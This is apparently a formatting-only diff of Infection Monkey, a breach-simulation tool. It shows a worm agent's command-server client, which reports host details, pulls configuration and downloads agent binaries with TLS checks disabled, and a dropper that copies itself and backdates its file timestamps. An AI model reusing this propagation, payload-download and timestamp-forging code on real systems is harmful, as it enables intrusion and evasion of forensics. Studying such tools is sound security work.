sambacry_shares_not_to_check = ["IPC$", "print$"]
|
sambacry_shares_not_to_check = ["IPC$", "print$"]
|
||||||
|
|
||||||
|
|
|
@ -9,9 +9,11 @@ from requests.exceptions import ConnectionError
|
||||||
|
|
||||||
import infection_monkey.monkeyfs as monkeyfs
|
import infection_monkey.monkeyfs as monkeyfs
|
||||||
import infection_monkey.tunnel as tunnel
|
import infection_monkey.tunnel as tunnel
|
||||||
from common.common_consts.timeouts import (LONG_REQUEST_TIMEOUT,
|
from common.common_consts.timeouts import (
|
||||||
MEDIUM_REQUEST_TIMEOUT,
|
LONG_REQUEST_TIMEOUT,
|
||||||
SHORT_REQUEST_TIMEOUT)
|
MEDIUM_REQUEST_TIMEOUT,
|
||||||
|
SHORT_REQUEST_TIMEOUT,
|
||||||
|
)
|
||||||
from common.common_consts.api_url_consts import T1216_PBA_FILE_DOWNLOAD_PATH
|
from common.common_consts.api_url_consts import T1216_PBA_FILE_DOWNLOAD_PATH
|
||||||
from infection_monkey.config import GUID, WormConfiguration
|
from infection_monkey.config import GUID, WormConfiguration
|
||||||
from infection_monkey.network.info import check_internet_access, local_ips
|
from infection_monkey.network.info import check_internet_access, local_ips
|
||||||
|
@ -19,7 +21,7 @@ from infection_monkey.transport.http import HTTPConnectProxy
|
||||||
from infection_monkey.transport.tcp import TcpProxy
|
from infection_monkey.transport.tcp import TcpProxy
|
||||||
from infection_monkey.utils.exceptions.planned_shutdown_exception import PlannedShutdownException
|
from infection_monkey.utils.exceptions.planned_shutdown_exception import PlannedShutdownException
|
||||||
|
|
||||||
__author__ = 'hoffer'
|
__author__ = "hoffer"
|
||||||
|
|
||||||
|
|
||||||
requests.packages.urllib3.disable_warnings()
|
requests.packages.urllib3.disable_warnings()
|
||||||
|
@ -49,27 +51,34 @@ class ControlClient(object):
|
||||||
if has_internet_access is None:
|
if has_internet_access is None:
|
||||||
has_internet_access = check_internet_access(WormConfiguration.internet_services)
|
has_internet_access = check_internet_access(WormConfiguration.internet_services)
|
||||||
|
|
||||||
monkey = {'guid': GUID,
|
monkey = {
|
||||||
'hostname': hostname,
|
"guid": GUID,
|
||||||
'ip_addresses': local_ips(),
|
"hostname": hostname,
|
||||||
'description': " ".join(platform.uname()),
|
"ip_addresses": local_ips(),
|
||||||
'internet_access': has_internet_access,
|
"description": " ".join(platform.uname()),
|
||||||
'config': WormConfiguration.as_dict(),
|
"internet_access": has_internet_access,
|
||||||
'parent': parent}
|
"config": WormConfiguration.as_dict(),
|
||||||
|
"parent": parent,
|
||||||
|
}
|
||||||
|
|
||||||
if ControlClient.proxies:
|
if ControlClient.proxies:
|
||||||
monkey['tunnel'] = ControlClient.proxies.get('https')
|
monkey["tunnel"] = ControlClient.proxies.get("https")
|
||||||
|
|
||||||
requests.post("https://%s/api/monkey" % (WormConfiguration.current_server,), # noqa: DUO123
|
requests.post(
|
||||||
data=json.dumps(monkey),
|
"https://%s/api/monkey" % (WormConfiguration.current_server,), # noqa: DUO123
|
||||||
headers={'content-type': 'application/json'},
|
data=json.dumps(monkey),
|
||||||
verify=False,
|
headers={"content-type": "application/json"},
|
||||||
proxies=ControlClient.proxies,
|
verify=False,
|
||||||
timeout=20)
|
proxies=ControlClient.proxies,
|
||||||
|
timeout=20,
|
||||||
|
)
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def find_server(default_tunnel=None):
|
def find_server(default_tunnel=None):
|
||||||
LOG.debug("Trying to wake up with Monkey Island servers list: %r" % WormConfiguration.command_servers)
|
LOG.debug(
|
||||||
|
"Trying to wake up with Monkey Island servers list: %r"
|
||||||
|
% WormConfiguration.command_servers
|
||||||
|
)
|
||||||
if default_tunnel:
|
if default_tunnel:
|
||||||
LOG.debug("default_tunnel: %s" % (default_tunnel,))
|
LOG.debug("default_tunnel: %s" % (default_tunnel,))
|
||||||
|
|
||||||
|
@ -83,10 +92,12 @@ class ControlClient(object):
|
||||||
if ControlClient.proxies:
|
if ControlClient.proxies:
|
||||||
debug_message += " through proxies: %s" % ControlClient.proxies
|
debug_message += " through proxies: %s" % ControlClient.proxies
|
||||||
LOG.debug(debug_message)
|
LOG.debug(debug_message)
|
||||||
requests.get(f"https://{server}/api?action=is-up", # noqa: DUO123
|
requests.get(
|
||||||
verify=False,
|
f"https://{server}/api?action=is-up", # noqa: DUO123
|
||||||
proxies=ControlClient.proxies,
|
verify=False,
|
||||||
timeout=TIMEOUT_IN_SECONDS)
|
proxies=ControlClient.proxies,
|
||||||
|
timeout=TIMEOUT_IN_SECONDS,
|
||||||
|
)
|
||||||
WormConfiguration.current_server = current_server
|
WormConfiguration.current_server = current_server
|
||||||
break
|
break
|
||||||
|
|
||||||
|
@ -105,7 +116,7 @@ class ControlClient(object):
|
||||||
if proxy_find:
|
if proxy_find:
|
||||||
proxy_address, proxy_port = proxy_find
|
proxy_address, proxy_port = proxy_find
|
||||||
LOG.info("Found tunnel at %s:%s" % (proxy_address, proxy_port))
|
LOG.info("Found tunnel at %s:%s" % (proxy_address, proxy_port))
|
||||||
ControlClient.proxies['https'] = 'https://%s:%s' % (proxy_address, proxy_port)
|
ControlClient.proxies["https"] = "https://%s:%s" % (proxy_address, proxy_port)
|
||||||
return ControlClient.find_server()
|
return ControlClient.find_server()
|
||||||
else:
|
else:
|
||||||
LOG.info("No tunnel found")
|
LOG.info("No tunnel found")
|
||||||
|
@ -118,74 +129,97 @@ class ControlClient(object):
|
||||||
try:
|
try:
|
||||||
monkey = {}
|
monkey = {}
|
||||||
if ControlClient.proxies:
|
if ControlClient.proxies:
|
||||||
monkey['tunnel'] = ControlClient.proxies.get('https')
|
monkey["tunnel"] = ControlClient.proxies.get("https")
|
||||||
requests.patch("https://%s/api/monkey/%s" % (WormConfiguration.current_server, GUID), # noqa: DUO123
|
requests.patch(
|
||||||
data=json.dumps(monkey),
|
"https://%s/api/monkey/%s"
|
||||||
headers={'content-type': 'application/json'},
|
% (WormConfiguration.current_server, GUID), # noqa: DUO123
|
||||||
verify=False,
|
data=json.dumps(monkey),
|
||||||
proxies=ControlClient.proxies,
|
headers={"content-type": "application/json"},
|
||||||
timeout=MEDIUM_REQUEST_TIMEOUT)
|
verify=False,
|
||||||
|
proxies=ControlClient.proxies,
|
||||||
|
timeout=MEDIUM_REQUEST_TIMEOUT,
|
||||||
|
)
|
||||||
except Exception as exc:
|
except Exception as exc:
|
||||||
LOG.warning("Error connecting to control server %s: %s",
|
LOG.warning(
|
||||||
WormConfiguration.current_server, exc)
|
"Error connecting to control server %s: %s", WormConfiguration.current_server, exc
|
||||||
|
)
|
||||||
return {}
|
return {}
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def send_telemetry(telem_category, json_data: str):
|
def send_telemetry(telem_category, json_data: str):
|
||||||
if not WormConfiguration.current_server:
|
if not WormConfiguration.current_server:
|
||||||
LOG.error("Trying to send %s telemetry before current server is established, aborting." % telem_category)
|
LOG.error(
|
||||||
|
"Trying to send %s telemetry before current server is established, aborting."
|
||||||
|
% telem_category
|
||||||
|
)
|
||||||
return
|
return
|
||||||
try:
|
try:
|
||||||
telemetry = {'monkey_guid': GUID, 'telem_category': telem_category, 'data': json_data}
|
telemetry = {"monkey_guid": GUID, "telem_category": telem_category, "data": json_data}
|
||||||
requests.post("https://%s/api/telemetry" % (WormConfiguration.current_server,), # noqa: DUO123
|
requests.post(
|
||||||
data=json.dumps(telemetry),
|
"https://%s/api/telemetry" % (WormConfiguration.current_server,), # noqa: DUO123
|
||||||
headers={'content-type': 'application/json'},
|
data=json.dumps(telemetry),
|
||||||
verify=False,
|
headers={"content-type": "application/json"},
|
||||||
proxies=ControlClient.proxies,
|
verify=False,
|
||||||
timeout=MEDIUM_REQUEST_TIMEOUT)
|
proxies=ControlClient.proxies,
|
||||||
|
timeout=MEDIUM_REQUEST_TIMEOUT,
|
||||||
|
)
|
||||||
except Exception as exc:
|
except Exception as exc:
|
||||||
LOG.warning("Error connecting to control server %s: %s",
|
LOG.warning(
|
||||||
WormConfiguration.current_server, exc)
|
"Error connecting to control server %s: %s", WormConfiguration.current_server, exc
|
||||||
|
)
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def send_log(log):
|
def send_log(log):
|
||||||
if not WormConfiguration.current_server:
|
if not WormConfiguration.current_server:
|
||||||
return
|
return
|
||||||
try:
|
try:
|
||||||
telemetry = {'monkey_guid': GUID, 'log': json.dumps(log)}
|
telemetry = {"monkey_guid": GUID, "log": json.dumps(log)}
|
||||||
requests.post("https://%s/api/log" % (WormConfiguration.current_server,), # noqa: DUO123
|
requests.post(
|
||||||
data=json.dumps(telemetry),
|
"https://%s/api/log" % (WormConfiguration.current_server,), # noqa: DUO123
|
||||||
headers={'content-type': 'application/json'},
|
data=json.dumps(telemetry),
|
||||||
verify=False,
|
headers={"content-type": "application/json"},
|
||||||
proxies=ControlClient.proxies,
|
verify=False,
|
||||||
timeout=MEDIUM_REQUEST_TIMEOUT)
|
proxies=ControlClient.proxies,
|
||||||
|
timeout=MEDIUM_REQUEST_TIMEOUT,
|
||||||
|
)
|
||||||
except Exception as exc:
|
except Exception as exc:
|
||||||
LOG.warning("Error connecting to control server %s: %s",
|
LOG.warning(
|
||||||
WormConfiguration.current_server, exc)
|
"Error connecting to control server %s: %s", WormConfiguration.current_server, exc
|
||||||
|
)
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def load_control_config():
|
def load_control_config():
|
||||||
if not WormConfiguration.current_server:
|
if not WormConfiguration.current_server:
|
||||||
return
|
return
|
||||||
try:
|
try:
|
||||||
reply = requests.get("https://%s/api/monkey/%s" % (WormConfiguration.current_server, GUID), # noqa: DUO123
|
reply = requests.get(
|
||||||
verify=False,
|
"https://%s/api/monkey/%s"
|
||||||
proxies=ControlClient.proxies,
|
% (WormConfiguration.current_server, GUID), # noqa: DUO123
|
||||||
timeout=MEDIUM_REQUEST_TIMEOUT)
|
verify=False,
|
||||||
|
proxies=ControlClient.proxies,
|
||||||
|
timeout=MEDIUM_REQUEST_TIMEOUT,
|
||||||
|
)
|
||||||
|
|
||||||
except Exception as exc:
|
except Exception as exc:
|
||||||
LOG.warning("Error connecting to control server %s: %s",
|
LOG.warning(
|
||||||
WormConfiguration.current_server, exc)
|
"Error connecting to control server %s: %s", WormConfiguration.current_server, exc
|
||||||
|
)
|
||||||
return
|
return
|
||||||
|
|
||||||
try:
|
try:
|
||||||
unknown_variables = WormConfiguration.from_kv(reply.json().get('config'))
|
unknown_variables = WormConfiguration.from_kv(reply.json().get("config"))
|
||||||
LOG.info("New configuration was loaded from server: %r" %
|
LOG.info(
|
||||||
(WormConfiguration.hide_sensitive_info(WormConfiguration.as_dict()),))
|
"New configuration was loaded from server: %r"
|
||||||
|
% (WormConfiguration.hide_sensitive_info(WormConfiguration.as_dict()),)
|
||||||
|
)
|
||||||
except Exception as exc:
|
except Exception as exc:
|
||||||
# we don't continue with default conf here because it might be dangerous
|
# we don't continue with default conf here because it might be dangerous
|
||||||
LOG.error("Error parsing JSON reply from control server %s (%s): %s",
|
LOG.error(
|
||||||
WormConfiguration.current_server, reply._content, exc)
|
"Error parsing JSON reply from control server %s (%s): %s",
|
||||||
|
WormConfiguration.current_server,
|
||||||
|
reply._content,
|
||||||
|
exc,
|
||||||
|
)
|
||||||
raise Exception("Couldn't load from from server's configuration, aborting. %s" % exc)
|
raise Exception("Couldn't load from from server's configuration, aborting. %s" % exc)
|
||||||
|
|
||||||
if unknown_variables:
|
if unknown_variables:
|
||||||
|
@ -196,14 +230,19 @@ class ControlClient(object):
|
||||||
if not WormConfiguration.current_server:
|
if not WormConfiguration.current_server:
|
||||||
return
|
return
|
||||||
try:
|
try:
|
||||||
requests.patch("https://%s/api/monkey/%s" % (WormConfiguration.current_server, GUID), # noqa: DUO123
|
requests.patch(
|
||||||
data=json.dumps({'config_error': True}),
|
"https://%s/api/monkey/%s"
|
||||||
headers={'content-type': 'application/json'},
|
% (WormConfiguration.current_server, GUID), # noqa: DUO123
|
||||||
verify=False,
|
data=json.dumps({"config_error": True}),
|
||||||
proxies=ControlClient.proxies,
|
headers={"content-type": "application/json"},
|
||||||
timeout=MEDIUM_REQUEST_TIMEOUT)
|
verify=False,
|
||||||
|
proxies=ControlClient.proxies,
|
||||||
|
timeout=MEDIUM_REQUEST_TIMEOUT,
|
||||||
|
)
|
||||||
except Exception as exc:
|
except Exception as exc:
|
||||||
LOG.warning("Error connecting to control server %s: %s", WormConfiguration.current_server, exc)
|
LOG.warning(
|
||||||
|
"Error connecting to control server %s: %s", WormConfiguration.current_server, exc
|
||||||
|
)
|
||||||
return {}
|
return {}
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
|
@ -221,7 +260,8 @@ class ControlClient(object):
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def download_monkey_exe_by_os(is_windows, is_32bit):
|
def download_monkey_exe_by_os(is_windows, is_32bit):
|
||||||
filename, size = ControlClient.get_monkey_exe_filename_and_size_by_host_dict(
|
filename, size = ControlClient.get_monkey_exe_filename_and_size_by_host_dict(
|
||||||
ControlClient.spoof_host_os_info(is_windows, is_32bit))
|
ControlClient.spoof_host_os_info(is_windows, is_32bit)
|
||||||
|
)
|
||||||
if filename is None:
|
if filename is None:
|
||||||
return None
|
return None
|
||||||
return ControlClient.download_monkey_exe_by_filename(filename, size)
|
return ControlClient.download_monkey_exe_by_filename(filename, size)
|
||||||
|
@ -241,14 +281,7 @@ class ControlClient(object):
|
||||||
else:
|
else:
|
||||||
arch = "x86_64"
|
arch = "x86_64"
|
||||||
|
|
||||||
return \
|
return {"os": {"type": os, "machine": arch}}
|
||||||
{
|
|
||||||
"os":
|
|
||||||
{
|
|
||||||
"type": os,
|
|
||||||
"machine": arch
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def download_monkey_exe_by_filename(filename, size):
|
def download_monkey_exe_by_filename(filename, size):
|
||||||
|
@ -259,13 +292,15 @@ class ControlClient(object):
|
||||||
if (monkeyfs.isfile(dest_file)) and (size == monkeyfs.getsize(dest_file)):
|
if (monkeyfs.isfile(dest_file)) and (size == monkeyfs.getsize(dest_file)):
|
||||||
return dest_file
|
return dest_file
|
||||||
else:
|
else:
|
||||||
download = requests.get("https://%s/api/monkey/download/%s" % # noqa: DUO123
|
download = requests.get(
|
||||||
(WormConfiguration.current_server, filename),
|
"https://%s/api/monkey/download/%s"
|
||||||
verify=False,
|
% (WormConfiguration.current_server, filename), # noqa: DUO123
|
||||||
proxies=ControlClient.proxies,
|
verify=False,
|
||||||
timeout=MEDIUM_REQUEST_TIMEOUT)
|
proxies=ControlClient.proxies,
|
||||||
|
timeout=MEDIUM_REQUEST_TIMEOUT,
|
||||||
|
)
|
||||||
|
|
||||||
with monkeyfs.open(dest_file, 'wb') as file_obj:
|
with monkeyfs.open(dest_file, "wb") as file_obj:
|
||||||
for chunk in download.iter_content(chunk_size=DOWNLOAD_CHUNK):
|
for chunk in download.iter_content(chunk_size=DOWNLOAD_CHUNK):
|
||||||
if chunk:
|
if chunk:
|
||||||
file_obj.write(chunk)
|
file_obj.write(chunk)
|
||||||
|
@ -274,8 +309,9 @@ class ControlClient(object):
|
||||||
return dest_file
|
return dest_file
|
||||||
|
|
||||||
except Exception as exc:
|
except Exception as exc:
|
||||||
LOG.warning("Error connecting to control server %s: %s",
|
LOG.warning(
|
||||||
WormConfiguration.current_server, exc)
|
"Error connecting to control server %s: %s", WormConfiguration.current_server, exc
|
||||||
|
)
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def get_monkey_exe_filename_and_size_by_host(host):
|
def get_monkey_exe_filename_and_size_by_host(host):
|
||||||
|
@ -286,24 +322,29 @@ class ControlClient(object):
|
||||||
if not WormConfiguration.current_server:
|
if not WormConfiguration.current_server:
|
||||||
return None, None
|
return None, None
|
||||||
try:
|
try:
|
||||||
reply = requests.post("https://%s/api/monkey/download" % (WormConfiguration.current_server,), # noqa: DUO123
|
reply = requests.post(
|
||||||
data=json.dumps(host_dict),
|
"https://%s/api/monkey/download"
|
||||||
headers={'content-type': 'application/json'},
|
% (WormConfiguration.current_server,), # noqa: DUO123
|
||||||
verify=False, proxies=ControlClient.proxies,
|
data=json.dumps(host_dict),
|
||||||
timeout=LONG_REQUEST_TIMEOUT)
|
headers={"content-type": "application/json"},
|
||||||
|
verify=False,
|
||||||
|
proxies=ControlClient.proxies,
|
||||||
|
timeout=LONG_REQUEST_TIMEOUT,
|
||||||
|
)
|
||||||
if 200 == reply.status_code:
|
if 200 == reply.status_code:
|
||||||
result_json = reply.json()
|
result_json = reply.json()
|
||||||
filename = result_json.get('filename')
|
filename = result_json.get("filename")
|
||||||
if not filename:
|
if not filename:
|
||||||
return None, None
|
return None, None
|
||||||
size = result_json.get('size')
|
size = result_json.get("size")
|
||||||
return filename, size
|
return filename, size
|
||||||
else:
|
else:
|
||||||
return None, None
|
return None, None
|
||||||
|
|
||||||
except Exception as exc:
|
except Exception as exc:
|
||||||
LOG.warning("Error connecting to control server %s: %s",
|
LOG.warning(
|
||||||
WormConfiguration.current_server, exc)
|
"Error connecting to control server %s: %s", WormConfiguration.current_server, exc
|
||||||
|
)
|
||||||
|
|
||||||
return None, None
|
return None, None
|
||||||
|
|
||||||
|
@ -312,11 +353,11 @@ class ControlClient(object):
|
||||||
if not WormConfiguration.current_server:
|
if not WormConfiguration.current_server:
|
||||||
return None
|
return None
|
||||||
|
|
||||||
my_proxy = ControlClient.proxies.get('https', '').replace('https://', '')
|
my_proxy = ControlClient.proxies.get("https", "").replace("https://", "")
|
||||||
if my_proxy:
|
if my_proxy:
|
||||||
proxy_class = TcpProxy
|
proxy_class = TcpProxy
|
||||||
try:
|
try:
|
||||||
target_addr, target_port = my_proxy.split(':', 1)
|
target_addr, target_port = my_proxy.split(":", 1)
|
||||||
target_port = int(target_port)
|
target_port = int(target_port)
|
||||||
except ValueError:
|
except ValueError:
|
||||||
return None
|
return None
|
||||||
|
@ -329,34 +370,43 @@ class ControlClient(object):
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def get_pba_file(filename):
|
def get_pba_file(filename):
|
||||||
try:
|
try:
|
||||||
return requests.get(PBA_FILE_DOWNLOAD % # noqa: DUO123
|
return requests.get(
|
||||||
(WormConfiguration.current_server, filename),
|
PBA_FILE_DOWNLOAD % (WormConfiguration.current_server, filename), # noqa: DUO123
|
||||||
verify=False,
|
verify=False,
|
||||||
proxies=ControlClient.proxies,
|
proxies=ControlClient.proxies,
|
||||||
timeout=LONG_REQUEST_TIMEOUT)
|
timeout=LONG_REQUEST_TIMEOUT,
|
||||||
|
)
|
||||||
except requests.exceptions.RequestException:
|
except requests.exceptions.RequestException:
|
||||||
return False
|
return False
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def get_T1216_pba_file():
|
def get_T1216_pba_file():
|
||||||
try:
|
try:
|
||||||
return requests.get(urljoin(f"https://{WormConfiguration.current_server}/", # noqa: DUO123
|
return requests.get(
|
||||||
T1216_PBA_FILE_DOWNLOAD_PATH),
|
urljoin(
|
||||||
verify=False,
|
f"https://{WormConfiguration.current_server}/", # noqa: DUO123
|
||||||
proxies=ControlClient.proxies,
|
T1216_PBA_FILE_DOWNLOAD_PATH,
|
||||||
stream=True,
|
),
|
||||||
timeout=MEDIUM_REQUEST_TIMEOUT)
|
verify=False,
|
||||||
|
proxies=ControlClient.proxies,
|
||||||
|
stream=True,
|
||||||
|
timeout=MEDIUM_REQUEST_TIMEOUT,
|
||||||
|
)
|
||||||
except requests.exceptions.RequestException:
|
except requests.exceptions.RequestException:
|
||||||
return False
|
return False
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def should_monkey_run(vulnerable_port: str) -> bool:
|
def should_monkey_run(vulnerable_port: str) -> bool:
|
||||||
if vulnerable_port and \
|
if (
|
||||||
WormConfiguration.get_hop_distance_to_island() > 1 and \
|
vulnerable_port
|
||||||
ControlClient.can_island_see_port(vulnerable_port) and \
|
and WormConfiguration.get_hop_distance_to_island() > 1
|
||||||
WormConfiguration.started_on_island:
|
and ControlClient.can_island_see_port(vulnerable_port)
|
||||||
raise PlannedShutdownException("Monkey shouldn't run on current machine "
|
and WormConfiguration.started_on_island
|
||||||
"(it will be exploited later with more depth).")
|
):
|
||||||
|
raise PlannedShutdownException(
|
||||||
|
"Monkey shouldn't run on current machine "
|
||||||
|
"(it will be exploited later with more depth)."
|
||||||
|
)
|
||||||
return True
|
return True
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
|
@ -365,13 +415,15 @@ class ControlClient(object):
|
||||||
url = f"https://{WormConfiguration.current_server}/api/monkey_control/check_remote_port/{port}"
|
url = f"https://{WormConfiguration.current_server}/api/monkey_control/check_remote_port/{port}"
|
||||||
response = requests.get(url, verify=False, timeout=SHORT_REQUEST_TIMEOUT)
|
response = requests.get(url, verify=False, timeout=SHORT_REQUEST_TIMEOUT)
|
||||||
response = json.loads(response.content.decode())
|
response = json.loads(response.content.decode())
|
||||||
return response['status'] == "port_visible"
|
return response["status"] == "port_visible"
|
||||||
except requests.exceptions.RequestException:
|
except requests.exceptions.RequestException:
|
||||||
return False
|
return False
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def report_start_on_island():
|
def report_start_on_island():
|
||||||
requests.post(f"https://{WormConfiguration.current_server}/api/monkey_control/started_on_island",
|
requests.post(
|
||||||
data=json.dumps({'started_on_island': True}),
|
f"https://{WormConfiguration.current_server}/api/monkey_control/started_on_island",
|
||||||
verify=False,
|
data=json.dumps({"started_on_island": True}),
|
||||||
timeout=MEDIUM_REQUEST_TIMEOUT)
|
verify=False,
|
||||||
|
timeout=MEDIUM_REQUEST_TIMEOUT,
|
||||||
|
)
|
||||||
|
|
|
@ -13,7 +13,11 @@ from ctypes import c_char_p
|
||||||
from common.utils.attack_utils import ScanStatus, UsageEnum
|
from common.utils.attack_utils import ScanStatus, UsageEnum
|
||||||
from infection_monkey.config import WormConfiguration
|
from infection_monkey.config import WormConfiguration
|
||||||
from infection_monkey.exploit.tools.helpers import build_monkey_commandline_explicitly
|
from infection_monkey.exploit.tools.helpers import build_monkey_commandline_explicitly
|
||||||
from infection_monkey.model import GENERAL_CMDLINE_LINUX, MONKEY_CMDLINE_LINUX, MONKEY_CMDLINE_WINDOWS
|
from infection_monkey.model import (
|
||||||
|
GENERAL_CMDLINE_LINUX,
|
||||||
|
MONKEY_CMDLINE_LINUX,
|
||||||
|
MONKEY_CMDLINE_WINDOWS,
|
||||||
|
)
|
||||||
from infection_monkey.system_info import OperatingSystem, SystemInfoCollector
|
from infection_monkey.system_info import OperatingSystem, SystemInfoCollector
|
||||||
from infection_monkey.telemetry.attack.t1106_telem import T1106Telem
|
from infection_monkey.telemetry.attack.t1106_telem import T1106Telem
|
||||||
|
|
||||||
|
@ -29,7 +33,7 @@ except NameError:
|
||||||
# noinspection PyShadowingBuiltins
|
# noinspection PyShadowingBuiltins
|
||||||
WindowsError = IOError
|
WindowsError = IOError
|
||||||
|
|
||||||
__author__ = 'itamar'
|
__author__ = "itamar"
|
||||||
|
|
||||||
LOG = logging.getLogger(__name__)
|
LOG = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
@ -39,108 +43,141 @@ MOVEFILE_DELAY_UNTIL_REBOOT = 4
|
||||||
class MonkeyDrops(object):
|
class MonkeyDrops(object):
|
||||||
def __init__(self, args):
|
def __init__(self, args):
|
||||||
arg_parser = argparse.ArgumentParser()
|
arg_parser = argparse.ArgumentParser()
|
||||||
arg_parser.add_argument('-p', '--parent')
|
arg_parser.add_argument("-p", "--parent")
|
||||||
arg_parser.add_argument('-t', '--tunnel')
|
arg_parser.add_argument("-t", "--tunnel")
|
||||||
arg_parser.add_argument('-s', '--server')
|
arg_parser.add_argument("-s", "--server")
|
||||||
arg_parser.add_argument('-d', '--depth', type=int)
|
arg_parser.add_argument("-d", "--depth", type=int)
|
||||||
arg_parser.add_argument('-l', '--location')
|
arg_parser.add_argument("-l", "--location")
|
||||||
arg_parser.add_argument('-vp', '--vulnerable-port')
|
arg_parser.add_argument("-vp", "--vulnerable-port")
|
||||||
self.monkey_args = args[1:]
|
self.monkey_args = args[1:]
|
||||||
self.opts, _ = arg_parser.parse_known_args(args)
|
self.opts, _ = arg_parser.parse_known_args(args)
|
||||||
|
|
||||||
self._config = {'source_path': os.path.abspath(sys.argv[0]),
|
self._config = {
|
||||||
'destination_path': self.opts.location}
|
"source_path": os.path.abspath(sys.argv[0]),
|
||||||
|
"destination_path": self.opts.location,
|
||||||
|
}
|
||||||
|
|
||||||
def initialize(self):
|
def initialize(self):
|
||||||
LOG.debug("Dropper is running with config:\n%s", pprint.pformat(self._config))
|
LOG.debug("Dropper is running with config:\n%s", pprint.pformat(self._config))
|
||||||
|
|
||||||
def start(self):
|
def start(self):
|
||||||
if self._config['destination_path'] is None:
|
if self._config["destination_path"] is None:
|
||||||
LOG.error("No destination path specified")
|
LOG.error("No destination path specified")
|
||||||
return False
|
return False
|
||||||
|
|
||||||
# we copy/move only in case path is different
|
# we copy/move only in case path is different
|
||||||
try:
|
try:
|
||||||
file_moved = filecmp.cmp(self._config['source_path'], self._config['destination_path'])
|
file_moved = filecmp.cmp(self._config["source_path"], self._config["destination_path"])
|
||||||
except OSError:
|
except OSError:
|
||||||
file_moved = False
|
file_moved = False
|
||||||
|
|
||||||
if not file_moved and os.path.exists(self._config['destination_path']):
|
if not file_moved and os.path.exists(self._config["destination_path"]):
|
||||||
os.remove(self._config['destination_path'])
|
os.remove(self._config["destination_path"])
|
||||||
|
|
||||||
# first try to move the file
|
# first try to move the file
|
||||||
if not file_moved and WormConfiguration.dropper_try_move_first:
|
if not file_moved and WormConfiguration.dropper_try_move_first:
|
||||||
try:
|
try:
|
||||||
shutil.move(self._config['source_path'],
|
shutil.move(self._config["source_path"], self._config["destination_path"])
|
||||||
self._config['destination_path'])
|
|
||||||
|
|
||||||
LOG.info("Moved source file '%s' into '%s'",
|
LOG.info(
|
||||||
self._config['source_path'], self._config['destination_path'])
|
"Moved source file '%s' into '%s'",
|
||||||
|
self._config["source_path"],
|
||||||
|
self._config["destination_path"],
|
||||||
|
)
|
||||||
|
|
||||||
file_moved = True
|
file_moved = True
|
||||||
except (WindowsError, IOError, OSError) as exc:
|
except (WindowsError, IOError, OSError) as exc:
|
||||||
LOG.debug("Error moving source file '%s' into '%s': %s",
|
LOG.debug(
|
||||||
self._config['source_path'], self._config['destination_path'],
|
"Error moving source file '%s' into '%s': %s",
|
||||||
exc)
|
self._config["source_path"],
|
||||||
|
self._config["destination_path"],
|
||||||
|
exc,
|
||||||
|
)
|
||||||
|
|
||||||
# if file still need to change path, copy it
|
# if file still need to change path, copy it
|
||||||
if not file_moved:
|
if not file_moved:
|
||||||
try:
|
try:
|
||||||
shutil.copy(self._config['source_path'],
|
shutil.copy(self._config["source_path"], self._config["destination_path"])
|
||||||
self._config['destination_path'])
|
|
||||||
|
|
||||||
LOG.info("Copied source file '%s' into '%s'",
|
LOG.info(
|
||||||
self._config['source_path'], self._config['destination_path'])
|
"Copied source file '%s' into '%s'",
|
||||||
|
self._config["source_path"],
|
||||||
|
self._config["destination_path"],
|
||||||
|
)
|
||||||
except (WindowsError, IOError, OSError) as exc:
|
except (WindowsError, IOError, OSError) as exc:
|
||||||
LOG.error("Error copying source file '%s' into '%s': %s",
|
LOG.error(
|
||||||
self._config['source_path'], self._config['destination_path'],
|
"Error copying source file '%s' into '%s': %s",
|
||||||
exc)
|
self._config["source_path"],
|
||||||
|
self._config["destination_path"],
|
||||||
|
exc,
|
||||||
|
)
|
||||||
|
|
||||||
return False
|
return False
|
||||||
|
|
||||||
if WormConfiguration.dropper_set_date:
|
if WormConfiguration.dropper_set_date:
|
||||||
if sys.platform == 'win32':
|
if sys.platform == "win32":
|
||||||
dropper_date_reference_path = os.path.expandvars(WormConfiguration.dropper_date_reference_path_windows)
|
dropper_date_reference_path = os.path.expandvars(
|
||||||
|
WormConfiguration.dropper_date_reference_path_windows
|
||||||
|
)
|
||||||
else:
|
else:
|
||||||
dropper_date_reference_path = WormConfiguration.dropper_date_reference_path_linux
|
dropper_date_reference_path = WormConfiguration.dropper_date_reference_path_linux
|
||||||
try:
|
try:
|
||||||
ref_stat = os.stat(dropper_date_reference_path)
|
ref_stat = os.stat(dropper_date_reference_path)
|
||||||
except OSError:
|
except OSError:
|
||||||
LOG.warning("Cannot set reference date using '%s', file not found",
|
LOG.warning(
|
||||||
dropper_date_reference_path)
|
"Cannot set reference date using '%s', file not found",
|
||||||
|
dropper_date_reference_path,
|
||||||
|
)
|
||||||
else:
|
else:
|
||||||
try:
|
try:
|
||||||
os.utime(self._config['destination_path'],
|
os.utime(
|
||||||
(ref_stat.st_atime, ref_stat.st_mtime))
|
self._config["destination_path"], (ref_stat.st_atime, ref_stat.st_mtime)
|
||||||
|
)
|
||||||
except OSError:
|
except OSError:
|
||||||
LOG.warning("Cannot set reference date to destination file")
|
LOG.warning("Cannot set reference date to destination file")
|
||||||
|
|
||||||
monkey_options = \
|
monkey_options = build_monkey_commandline_explicitly(
|
||||||
build_monkey_commandline_explicitly(parent=self.opts.parent,
|
parent=self.opts.parent,
|
||||||
tunnel=self.opts.tunnel,
|
tunnel=self.opts.tunnel,
|
||||||
server=self.opts.server,
|
server=self.opts.server,
|
||||||
depth=self.opts.depth,
|
depth=self.opts.depth,
|
||||||
location=None,
|
location=None,
|
||||||
vulnerable_port=self.opts.vulnerable_port)
|
vulnerable_port=self.opts.vulnerable_port,
|
||||||
|
)
|
||||||
|
|
||||||
